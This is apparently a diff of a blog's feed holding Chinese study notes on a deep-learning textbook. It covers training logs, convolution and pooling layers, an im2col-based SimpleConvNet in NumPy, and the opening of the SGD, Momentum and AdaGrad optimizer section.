epoch 229 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 230 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 231 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 232 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 233 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 234 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 235 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 236 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 237 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 238 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 239 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 240 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 241 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 242 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 243 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 244 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 245 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 246 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 247 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 248 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 249 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 250 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 251 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 252 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 253 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 254 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 255 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 256 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 257 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 258 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 259 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 260 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 261 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 262 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 263 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 264 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 265 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 266 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 267 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 268 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 269 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 270 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 271 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 272 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 273 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 274 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 275 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 276 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 277 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 278 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 279 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 280 |  iter 1 / 10 | time 0[s] | loss 0.10| epoch 281 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 282 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 283 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 284 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 285 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 286 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 287 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 288 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 289 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 290 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 291 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 292 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 293 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 294 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 295 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 296 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 297 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 298 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 299 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 300 |  iter 1 / 10 | time 0[s] | loss 0.11

    png

    1.5 计算的高速化

    1.5.1 位精度

    随着深度学习备受瞩目,最近的 GPU 已经开始支持 16 位半精度浮点数的存储与计算。另外,谷歌公司设计了一款名为 TPU 的专用芯片,可以支持 8 位计算。

    1.5.2 GPU(CuPy)

    CuPy 是基于 GPU 进行并行计算的库。要使用 CuPy,需要使用安装有 NVIDIA 的 GPU 的机器,并且需要安装 CUDA 这个面向 GPU 的通用并行计算平台。

    1.6 小结

    • 神经网络具有输入层、隐藏层和输出层

    • 通过全连接层进行线性变换,通过激活函数进行非线性变换

    • 全连接层和 mini-batch 处理都可以写成矩阵计算

    • 使用误差反向传播法可以高效地求解神经网络的损失的梯度

    • 使用计算图能够将神经网络中发生的处理可视化,这有助于理解正向传播和反向传播

    • 在神经网络的实现中,通过将组件模块化为层,可以简化实现

    • 数据的位精度和 GPU 并行计算对神经网络的高速化非常重要

    ]]>
    @@ -8090,7 +8090,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-7-%E5%8D%B7%E7%A7%AF%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/ - 正文

    png

    7.2 卷积层

    7.2.1 全连接层存在的问题

    全连接层存在的问题:数据的形状被“忽视”。

    卷积神经网络可以保持形状不变。

    卷积层的输入数据称为输入特征图(input feature map)

    输出数据称为输出特征图(output feature map)

    7.2.2 卷积运算

    png

    卷积层进行的处理就是卷积运算。卷积运算相当于图像处理中的“滤波器运算”。

    将各个位置上滤波器的元素和输入的对应元素相乘,然后再求和(有时将这个计算称为乘积累加运算)。然后,将这个结果保存到输出的对应位置。将这个过程在所有位置都进行一遍,就可以得到卷积运算的输出。

    7.2.3 填充

    png

    在卷积层的处理之前,向输入数据的周围填入固定的数据,称为填充(padding)

    7.2.4 步幅

    png

    应用滤波器的位置间隔称为步幅(stride)

    假设输入大小为 $(H,W)$,滤波器大小为 $(FH, FW)$,输出大小为 $(OH,OW)$,填充为 $P$,步幅为 $S$。

    $$OH=\frac{H+2P-FH}{S}+1\OW=\frac{W+2P-FW}{S}+1$$

    7.2.5 3 维数据的卷积运算

    png

    7.2.6 结合方块思考

    将数据和滤波器结合长方体的方块来考虑,3 维数据的卷积运算会很容易理解。

    png

    7.2.7 批处理

    网络间传递的是 4 维数据,对这 N 个数据进行了卷积运算。也就是说,批处理将 N 次的处理汇总成了 1 次进行。

    7.3 池化层

    png

    池化是缩小高、长方向上的空间的运算。

    在图像识别领域,主要使用 Max 池化。

    池化层的特征

    • 没有要学习的参数

      • 池化层和卷积层不同,没有要学习的参数。池化只是从目标区域中取最大值(或者平均值),所以不存在要学习的参数。
    • 通道数不发生变化

      • 经过池化运算,输入数据和输出数据的通道数不会发生变化。
    • 对微小的位置变化具有鲁棒性(健壮)

      • 输入数据发生微小偏差时,池化仍会返回相同的结果。因此,池化对输入数据的微小偏差具有鲁棒性。

    7.4 卷积层和池化层的实现

    7.4.1 4 维数组

    所谓 4 维数据,比如数据的形状是(10, 1, 28, 28),则它对应 10 个高为 28、长为 28、通道为 1 的数据。

    x = np.random.rand(10, 1, 28, 28)
    x.shape
    (10, 1, 28, 28)

    访问第 1 个数据:

    x[0].shape
    (1, 28, 28)

    访问第 1 个数据的第 1 个通道的空间数据:

    x[0, 0]  # 或 x[0][0]

    7.4.2 基于 im2col 的展开

    如果老老实实地实现卷积运算,估计要重复好几层的for语句。这样的实现有点麻烦,而且,NumPy 中存在使用 for 语句后处理变慢的缺点(NumPy 中,访问元素时最好不要用for语句)。

    im2col是一个函数,将输入数据展开以适合滤波器(权重)。对 3 维的输入数据应用im2col后,数据转换为 2 维矩阵(正确地讲,是把包含批数量的 4 维数据转换成了 2 维数据)。

    png

    im2col 这个名称是“image to column”的缩写,翻译过来就是“从图像到矩阵”的意思。

    7.4.3 卷积层的实现

    im2col(input_data, filter_h, filter_w, stride=1, pad=0)

    • input_data―由(数据量,通道,高,长)的 4 维数组构成的输入数据

    • filter_h―滤波器的高

    • filter_w―滤波器的长

    • stride―步幅

    • pad―填充

    import sys, os
    sys.path.append(os.pardir)
    from common.util import im2col

    x1 = np.random.rand(1, 3, 7, 7)
    col1 = im2col(x1, 5, 5, stride=1, pad=0)
    print(col1.shape) # (9, 75)

    x2 = np.random.rand(10, 3, 7, 7) # 10 个数据
    col2 = im2col(x2, 5, 5, stride=1, pad=0)
    print(col2.shape) # (90, 75)
    (9, 75)(90, 75)

    使用 im2col 来实现卷积层:

    class Convolution:


    def __init__(self, W, b, stride=1, pad=0):
    """
    将滤波器(权重)、偏置、步幅、填充作为参数接收。
    滤波器是(FN, C, FH, FW) 的 4 维形状。
    另外,FN、C、FH、FW 分别是 Filter Number(滤波器数量)、Channel、Filter Height、Filter Width 的缩写。
    """
    self.W = W
    self.b = b
    self.stride = stride
    self.pad = pad


    def forward(self, x):
    FN, C, FH, FW = self.W.shape
    N, C, H, W = x.shape
    out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
    out_w = int(1 + (W + 2*self.pad - FW) / self.stride)
    col = im2col(x, FH, FW, self.stride, self.pad)
    col_W = self.W.reshape(FN, -1).T # 滤波器的展开
    out = np.dot(col, col_W) + self.b
    out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2) # 修改轴顺序
    return out

    7.4.4 池化层的实现

    png

    池化的应用区域按通道单独展开。

    class Pooling:


    def __init__(self, pool_h, pool_w, stride=1, pad=0):
    self.pool_h = pool_h
    self.pool_w = pool_w
    self.stride = stride
    self.pad = pad


    def forward(self, x):
    N, C, H, W = x.shape
    out_h = int(1 + (H - self.pool_h) / self.stride)
    out_w = int(1 + (W - self.pool_w) / self.stride)
    # 展开(1)
    col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
    col = col.reshape(-1, self.pool_h*self.pool_w)
    # 最大值(2)
    out = np.max(col, axis=1)
    # 转换(3)
    out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
    return out

    池化层的实现按下面 3 个阶段:

    • 展开输入数据。

    • 求各行的最大值。

    • 转换为合适的输出大小

    7.5 CNN 的实现

    class SimpleConvNet:
    """简单的 ConvNet

    conv - relu - pool - affine - relu - affine - softmax

    Parameters
    ----------
    input_size : 输入大小(MNIST 的情况下为 784)
    hidden_size_list : 隐藏层的神经元数量的列表(e.g. [100, 100, 100])
    output_size : 输出大小(MNIST 的情况下为 10)
    activation : 'relu' or 'sigmoid'
    weight_init_std : 指定权重的标准差(e.g. 0.01)
    指定'relu'或'he'的情况下设定“He 的初始值”
    指定'sigmoid'或'xavier'的情况下设定“Xavier 的初始值”
    """
    def __init__(self, input_dim=(1, 28, 28),
    conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
    hidden_size=100, output_size=10, weight_init_std=0.01):
    filter_num = conv_param['filter_num']
    filter_size = conv_param['filter_size']
    filter_pad = conv_param['pad']
    filter_stride = conv_param['stride']
    input_size = input_dim[1]
    conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
    pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

    # 初始化权重
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
    self.params['b1'] = np.zeros(filter_num)
    self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
    self.params['b2'] = np.zeros(hidden_size)
    self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b3'] = np.zeros(output_size)

    # 生成层
    self.layers = OrderedDict()
    self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
    conv_param['stride'], conv_param['pad'])
    self.layers['Relu1'] = Relu()
    self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
    self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
    self.layers['Relu2'] = Relu()
    self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

    self.last_layer = SoftmaxWithLoss()

    def predict(self, x):
    for layer in self.layers.values():
    x = layer.forward(x)

    return x

    def loss(self, x, t):
    """
    求损失函数
    参数 x 是输入数据、t 是教师标签
    """
    y = self.predict(x)
    return self.last_layer.forward(y, t)

    def accuracy(self, x, t, batch_size=100):
    if t.ndim != 1 : t = np.argmax(t, axis=1)

    acc = 0.0

    for i in range(int(x.shape[0] / batch_size)):
    tx = x[i*batch_size:(i+1)*batch_size]
    tt = t[i*batch_size:(i+1)*batch_size]
    y = self.predict(tx)
    y = np.argmax(y, axis=1)
    acc += np.sum(y == tt)

    return acc / x.shape[0]

    def numerical_gradient(self, x, t):
    """求梯度(数值微分)

    Parameters
    ----------
    x : 输入数据
    t : 教师标签

    Returns
    -------
    具有各层的梯度的字典变量
    grads['W1']、grads['W2']、...是各层的权重
    grads['b1']、grads['b2']、...是各层的偏置
    """
    loss_w = lambda w: self.loss(x, t)

    grads = {}
    for idx in (1, 2, 3):
    grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
    grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

    return grads

    def gradient(self, x, t):
    """求梯度(误差反向传播法)

    Parameters
    ----------
    x : 输入数据
    t : 教师标签

    Returns
    -------
    具有各层的梯度的字典变量
    grads['W1']、grads['W2']、...是各层的权重
    grads['b1']、grads['b2']、...是各层的偏置
    """
    # forward
    self.loss(x, t)

    # backward
    dout = 1
    dout = self.last_layer.backward(dout)

    layers = list(self.layers.values())
    layers.reverse()
    for layer in layers:
    dout = layer.backward(dout)

    # 设定
    grads = {}
    grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
    grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
    grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

    return grads

    def save_params(self, file_name="params.pkl"):
    params = {}
    for key, val in self.params.items():
    params[key] = val
    with open(file_name, 'wb') as f:
    pickle.dump(params, f)

    def load_params(self, file_name="params.pkl"):
    with open(file_name, 'rb') as f:
    params = pickle.load(f)
    for key, val in params.items():
    self.params[key] = val

    for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
    self.layers[key].W = self.params['W' + str(i+1)]
    self.layers[key].b = self.params['b' + str(i+1)]

    如果使用 MNIST 数据集训练 SimpleConvNet,则训练数据的识别率为 99.82%,测试数据的识别率为 98.96%(每次学习的识别精度都会发生一些误差)。测试数据的识别率大约为 99%,就小型网络来说,这是一个非常高的识别率。

    7.7 具有代表性的 CNN

    png

    7.7.1LeNet

    png

    于 1998 年首次被提出。

    7.7.2 AlexNet

    png

    2012 年被提出,AlexNet 是引发深度学习热潮的导火线。

    • 激活函数使用 ReLU

    • 使用进行局部正规化的 LRN(Local Response Normalization)层

    • 使用 Dropout

    7.8 小结

    • CNN 在此前的全连接层的网络中新增了卷积层和池化层。

    • 使用 im2col 函数可以简单、高效地实现卷积层和池化层。

    • 通过 CNN 的可视化,可知随着层次变深,提取的信息愈加高级。

    • LeNet 和 AlexNet 是 CNN 的代表性网络。

    • 在深度学习的发展中,大数据和 GPU 做出了很大的贡献。

    ]]>
    + 正文

    png

    7.2 卷积层

    7.2.1 全连接层存在的问题

    全连接层存在的问题:数据的形状被“忽视”。

    卷积神经网络可以保持形状不变。

    卷积层的输入数据称为输入特征图(input feature map)

    输出数据称为输出特征图(output feature map)

    7.2.2 卷积运算

    png

    卷积层进行的处理就是卷积运算。卷积运算相当于图像处理中的“滤波器运算”。

    将各个位置上滤波器的元素和输入的对应元素相乘,然后再求和(有时将这个计算称为乘积累加运算)。然后,将这个结果保存到输出的对应位置。将这个过程在所有位置都进行一遍,就可以得到卷积运算的输出。

    7.2.3 填充

    png

    在卷积层的处理之前,向输入数据的周围填入固定的数据,称为填充(padding)

    7.2.4 步幅

    png

    应用滤波器的位置间隔称为步幅(stride)

    假设输入大小为 $(H,W)$,滤波器大小为 $(FH, FW)$,输出大小为 $(OH,OW)$,填充为 $P$,步幅为 $S$。

    $$OH=\frac{H+2P-FH}{S}+1\OW=\frac{W+2P-FW}{S}+1$$

    7.2.5 3 维数据的卷积运算

    png

    7.2.6 结合方块思考

    将数据和滤波器结合长方体的方块来考虑,3 维数据的卷积运算会很容易理解。

    png

    7.2.7 批处理

    网络间传递的是 4 维数据,对这 N 个数据进行了卷积运算。也就是说,批处理将 N 次的处理汇总成了 1 次进行。

    7.3 池化层

    png

    池化是缩小高、长方向上的空间的运算。

    在图像识别领域,主要使用 Max 池化。

    池化层的特征

    • 没有要学习的参数

      • 池化层和卷积层不同,没有要学习的参数。池化只是从目标区域中取最大值(或者平均值),所以不存在要学习的参数。
    • 通道数不发生变化

      • 经过池化运算,输入数据和输出数据的通道数不会发生变化。
    • 对微小的位置变化具有鲁棒性(健壮)

      • 输入数据发生微小偏差时,池化仍会返回相同的结果。因此,池化对输入数据的微小偏差具有鲁棒性。

    7.4 卷积层和池化层的实现

    7.4.1 4 维数组

    所谓 4 维数据,比如数据的形状是(10, 1, 28, 28),则它对应 10 个高为 28、长为 28、通道为 1 的数据。

    1
    2
    x = np.random.rand(10, 1, 28, 28)
    x.shape
    (10, 1, 28, 28)

    访问第 1 个数据:

    1
    x[0].shape
    (1, 28, 28)

    访问第 1 个数据的第 1 个通道的空间数据:

    1
    x[0, 0]  # 或 x[0][0]

    7.4.2 基于 im2col 的展开

    如果老老实实地实现卷积运算,估计要重复好几层的for语句。这样的实现有点麻烦,而且,NumPy 中存在使用 for 语句后处理变慢的缺点(NumPy 中,访问元素时最好不要用for语句)。

    im2col是一个函数,将输入数据展开以适合滤波器(权重)。对 3 维的输入数据应用im2col后,数据转换为 2 维矩阵(正确地讲,是把包含批数量的 4 维数据转换成了 2 维数据)。

    png

    im2col 这个名称是“image to column”的缩写,翻译过来就是“从图像到矩阵”的意思。

    7.4.3 卷积层的实现

    im2col(input_data, filter_h, filter_w, stride=1, pad=0)

    • input_data―由(数据量,通道,高,长)的 4 维数组构成的输入数据

    • filter_h―滤波器的高

    • filter_w―滤波器的长

    • stride―步幅

    • pad―填充

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import sys, os
    sys.path.append(os.pardir)
    from common.util import im2col

    x1 = np.random.rand(1, 3, 7, 7)
    col1 = im2col(x1, 5, 5, stride=1, pad=0)
    print(col1.shape) # (9, 75)

    x2 = np.random.rand(10, 3, 7, 7) # 10 个数据
    col2 = im2col(x2, 5, 5, stride=1, pad=0)
    print(col2.shape) # (90, 75)
    (9, 75)(90, 75)

    使用 im2col 来实现卷积层:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    class Convolution:


    def __init__(self, W, b, stride=1, pad=0):
    """
    将滤波器(权重)、偏置、步幅、填充作为参数接收。
    滤波器是(FN, C, FH, FW) 的 4 维形状。
    另外,FN、C、FH、FW 分别是 Filter Number(滤波器数量)、Channel、Filter Height、Filter Width 的缩写。
    """
    self.W = W
    self.b = b
    self.stride = stride
    self.pad = pad


    def forward(self, x):
    FN, C, FH, FW = self.W.shape
    N, C, H, W = x.shape
    out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
    out_w = int(1 + (W + 2*self.pad - FW) / self.stride)
    col = im2col(x, FH, FW, self.stride, self.pad)
    col_W = self.W.reshape(FN, -1).T # 滤波器的展开
    out = np.dot(col, col_W) + self.b
    out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2) # 修改轴顺序
    return out

    7.4.4 池化层的实现

    png

    池化的应用区域按通道单独展开。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    class Pooling:


    def __init__(self, pool_h, pool_w, stride=1, pad=0):
    self.pool_h = pool_h
    self.pool_w = pool_w
    self.stride = stride
    self.pad = pad


    def forward(self, x):
    N, C, H, W = x.shape
    out_h = int(1 + (H - self.pool_h) / self.stride)
    out_w = int(1 + (W - self.pool_w) / self.stride)
    # 展开(1)
    col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
    col = col.reshape(-1, self.pool_h*self.pool_w)
    # 最大值(2)
    out = np.max(col, axis=1)
    # 转换(3)
    out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
    return out

    池化层的实现按下面 3 个阶段:

    • 展开输入数据。

    • 求各行的最大值。

    • 转换为合适的输出大小

    7.5 CNN 的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    class SimpleConvNet:
    """简单的 ConvNet

    conv - relu - pool - affine - relu - affine - softmax

    Parameters
    ----------
    input_size : 输入大小(MNIST 的情况下为 784)
    hidden_size_list : 隐藏层的神经元数量的列表(e.g. [100, 100, 100])
    output_size : 输出大小(MNIST 的情况下为 10)
    activation : 'relu' or 'sigmoid'
    weight_init_std : 指定权重的标准差(e.g. 0.01)
    指定'relu'或'he'的情况下设定“He 的初始值”
    指定'sigmoid'或'xavier'的情况下设定“Xavier 的初始值”
    """
    def __init__(self, input_dim=(1, 28, 28),
    conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
    hidden_size=100, output_size=10, weight_init_std=0.01):
    filter_num = conv_param['filter_num']
    filter_size = conv_param['filter_size']
    filter_pad = conv_param['pad']
    filter_stride = conv_param['stride']
    input_size = input_dim[1]
    conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
    pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

    # 初始化权重
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
    self.params['b1'] = np.zeros(filter_num)
    self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
    self.params['b2'] = np.zeros(hidden_size)
    self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b3'] = np.zeros(output_size)

    # 生成层
    self.layers = OrderedDict()
    self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
    conv_param['stride'], conv_param['pad'])
    self.layers['Relu1'] = Relu()
    self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
    self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
    self.layers['Relu2'] = Relu()
    self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

    self.last_layer = SoftmaxWithLoss()

    def predict(self, x):
    for layer in self.layers.values():
    x = layer.forward(x)

    return x

    def loss(self, x, t):
    """
    求损失函数
    参数 x 是输入数据、t 是教师标签
    """
    y = self.predict(x)
    return self.last_layer.forward(y, t)

    def accuracy(self, x, t, batch_size=100):
    if t.ndim != 1 : t = np.argmax(t, axis=1)

    acc = 0.0

    for i in range(int(x.shape[0] / batch_size)):
    tx = x[i*batch_size:(i+1)*batch_size]
    tt = t[i*batch_size:(i+1)*batch_size]
    y = self.predict(tx)
    y = np.argmax(y, axis=1)
    acc += np.sum(y == tt)

    return acc / x.shape[0]

    def numerical_gradient(self, x, t):
    """求梯度(数值微分)

    Parameters
    ----------
    x : 输入数据
    t : 教师标签

    Returns
    -------
    具有各层的梯度的字典变量
    grads['W1']、grads['W2']、...是各层的权重
    grads['b1']、grads['b2']、...是各层的偏置
    """
    loss_w = lambda w: self.loss(x, t)

    grads = {}
    for idx in (1, 2, 3):
    grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
    grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

    return grads

    def gradient(self, x, t):
    """求梯度(误差反向传播法)

    Parameters
    ----------
    x : 输入数据
    t : 教师标签

    Returns
    -------
    具有各层的梯度的字典变量
    grads['W1']、grads['W2']、...是各层的权重
    grads['b1']、grads['b2']、...是各层的偏置
    """
    # forward
    self.loss(x, t)

    # backward
    dout = 1
    dout = self.last_layer.backward(dout)

    layers = list(self.layers.values())
    layers.reverse()
    for layer in layers:
    dout = layer.backward(dout)

    # 设定
    grads = {}
    grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
    grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
    grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

    return grads

    def save_params(self, file_name="params.pkl"):
    params = {}
    for key, val in self.params.items():
    params[key] = val
    with open(file_name, 'wb') as f:
    pickle.dump(params, f)

    def load_params(self, file_name="params.pkl"):
    with open(file_name, 'rb') as f:
    params = pickle.load(f)
    for key, val in params.items():
    self.params[key] = val

    for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
    self.layers[key].W = self.params['W' + str(i+1)]
    self.layers[key].b = self.params['b' + str(i+1)]

    如果使用 MNIST 数据集训练 SimpleConvNet,则训练数据的识别率为 99.82%,测试数据的识别率为 98.96%(每次学习的识别精度都会发生一些误差)。测试数据的识别率大约为 99%,就小型网络来说,这是一个非常高的识别率。

    7.7 具有代表性的 CNN

    png

    7.7.1LeNet

    png

    于 1998 年首次被提出。

    7.7.2 AlexNet

    png

    2012 年被提出,AlexNet 是引发深度学习热潮的导火线。

    • 激活函数使用 ReLU

    • 使用进行局部正规化的 LRN(Local Response Normalization)层

    • 使用 Dropout

    7.8 小结

    • CNN 在此前的全连接层的网络中新增了卷积层和池化层。

    • 使用 im2col 函数可以简单、高效地实现卷积层和池化层。

    • 通过 CNN 的可视化,可知随着层次变深,提取的信息愈加高级。

    • LeNet 和 AlexNet 是 CNN 的代表性网络。

    • 在深度学习的发展中,大数据和 GPU 做出了很大的贡献。

    ]]>
    @@ -8117,7 +8117,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-6-%E4%B8%8E%E5%AD%A6%E4%B9%A0%E7%9B%B8%E5%85%B3%E7%9A%84%E6%8A%80%E5%B7%A7/ - 正文

    6.1 参数的更新

    6.1.2 SGD

    $$\mathbf W\leftarrow \mathbf W -\eta\frac{\partial L}{\partial \mathbf W}$$

    class SGD:
    def __init__(self, lr=0.01):
    self.lr = lr

    def update(self, params, grads):
    for key in params.keys():
    params[key] -= self.lr * grads[key]

    6.1.3 SGD 的缺点

    png

    如果函数的形状非均向(anisotropic),比如呈延伸状,搜索的路径就会非常低效。因此,我们需要比单纯朝梯度方向前进的 SGD 更聪明的方法。SGD 低效的根本原因是,梯度的方向并没有指向最小值的方向(指向极小值的方向)。

    6.1.4 Momentum

    png

    $$v\leftarrow \alpha v -\eta\frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W \leftarrow \mathbf W + v$$

    • Momentum 方法给人的感觉就像是小球在地面上滚动。

    • 新出现了一个变量 $v$,对应物理上的速度。

    • $\alpha v$ 这一项。在物体不受任何力时,该项承担使物体逐渐减速的任务($\alpha$ 设定为 0.9 之类的值),对应物理上的地面摩擦或空气阻力。

    class Momentum:
    def __init__(self, lr=0.01, momentum=0.9):
    self.lr = lr
    self.momentum = momentum
    self.v = None


    def update(self, params, grads):
    if self.v is None:
    self.v = {}
    for key, val in params.items():
    self.v[key] = np.zeros_like(val)

    for key in params.keys():
    self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
    params[key] += self.v[key]

    6.1.5 AdaGrad

    在神经网络的学习中,学习率(数学式中记为 $\eta$)的值很重要。

    • 学习率过小,会导致学习花费过多时间;

    • 学习率过大,则会导致学习发散而不能正确进行。

    在关于学习率的有效技巧中,有一种被称为**学习率衰减(learning rate decay)**的方法,即随着学习的进行,使学习率逐渐减小。实际上,一开始“多”学,然后逐渐“少”学的方法,在神经网络的学习中经常被使用。

    $$\mathbf h\leftarrow \mathbf h + \frac{\partial L}{\partial \mathbf W} \odot \frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W\leftarrow \mathbf W - \eta\frac{1}{\sqrt{\mathbf h}}\frac{\partial L}{\partial \mathbf W}$$

